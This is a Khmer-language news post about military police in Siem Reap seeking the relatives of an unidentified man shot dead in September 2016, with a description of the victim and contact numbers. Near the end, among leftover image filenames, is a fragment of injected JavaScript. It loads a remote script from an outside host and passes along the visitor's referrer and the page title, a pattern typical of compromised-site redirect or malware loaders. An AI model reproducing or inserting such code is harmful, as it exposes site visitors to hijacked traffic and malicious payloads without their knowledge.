កងរាជអាវុធហត្ថខេត្តសៀមរាបសូមប្រកាសស្វែងសាច់ញ្ញាតិបុរសមិនស្គាល់​អត្តសញ្ញាណ​ម្នាក់ ត្រូវបានជនមិនស្គាល់មុខបាញ់ស្លាប់យ៉ាងព្រៃផ្សៃ!

សៀមរាប៖ នៅព្រឹកថ្ងៃទី២៧ ខែកញ្ញា ឆ្នាំ២០១៦ បុរសម្នាក់ត្រូវបានប្រជាពលរដ្ឋប្រទះឃើញដេកស្លាប់ស្ថិតនៅក្រុមទី៤ ក្នុងភូមិត្រពាំងរុន សង្កាត់អំពិល ក្រុង-ខេត្តសៀមរាប តាមបណ្ដោយផ្លូវ៦០ម៉ែត្រ ចម្ងាយពីរង្វង់មូលព្រៃគុយប្រហែល៣គីឡូម៉ែត្រ បង្កការភ្ញាក់ផ្អើលដល់ប្រជាពលរដ្ឋ ហើយបានរាយការណ៍ជូនសមត្ថកិច្ចក្រោយពីទទួលបានដំណឹង សមត្ថកិច្ចអាវុធហត្ថបានទៅដល់កន្លែងកើតហេតុ ពិនិត្យសាកសព ជនរងគ្រោះត្រូវបានជនមិនស្គាល់មុខបាញ់មួយគ្រាប់ចំកធ្លាយមកក្រោយ នៅជាប់ខ្លួនជនរងគ្រោះមានសំបុត្រឡានក្រុង ០១សន្លឹក។ 

តាមប្រភពពីមន្រ្តីអាវុធហត្ថដែលបានចុះពិនិត្យក្នុងហេតុការណ៍នោះបានឲ្យដឹងថា ករណីខាងលើនេះ សមត្ថកិច្ចកំពុងធ្វើការស្រាវជ្រាវបន្ត រកសាវតារជនរងគ្រោះដែលមានអាយុប្រហែលជា២៦ឆ្នាំកំពស់១ម៉ែត្រ៦៩ ស្លៀកខោ ខោ ប៊យពណ៍ខៀវ អាវដៃវែងពណ៍ខៀវអុចពណ៍ស សក់ខ្លីពណ៍ខ្មៅ សំបុលសណ្តែកបាយ ពាក់មួកពណ៍ខ្មៅ ស្បែកជើងផ្ទាត់ពណ៍សរូបក្រពើខាងលើ មានរូបសក្ក័កងចក្រនៅស្មាខាងស្តាំ។


បច្ចុប្បន្នសាកសព ត្រូវបានដឹកយកទៅរក្សាទុកនៅក្នុងវត្តគោកចាន់ រង់ចាំស្រាវជ្រាវរកសាច់ញាតិមកទទួលយកទៅធ្វើបុណ្យ។
លេខទូរស័ព្ទទំនាក់ទំនង: 012630645/0976777555/0977222251

14470444_314583798900730_1903845000912667409_n 14495240_314583748900735_4762615891224625484_n 14517644_314583728900737_4138950557354688713_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More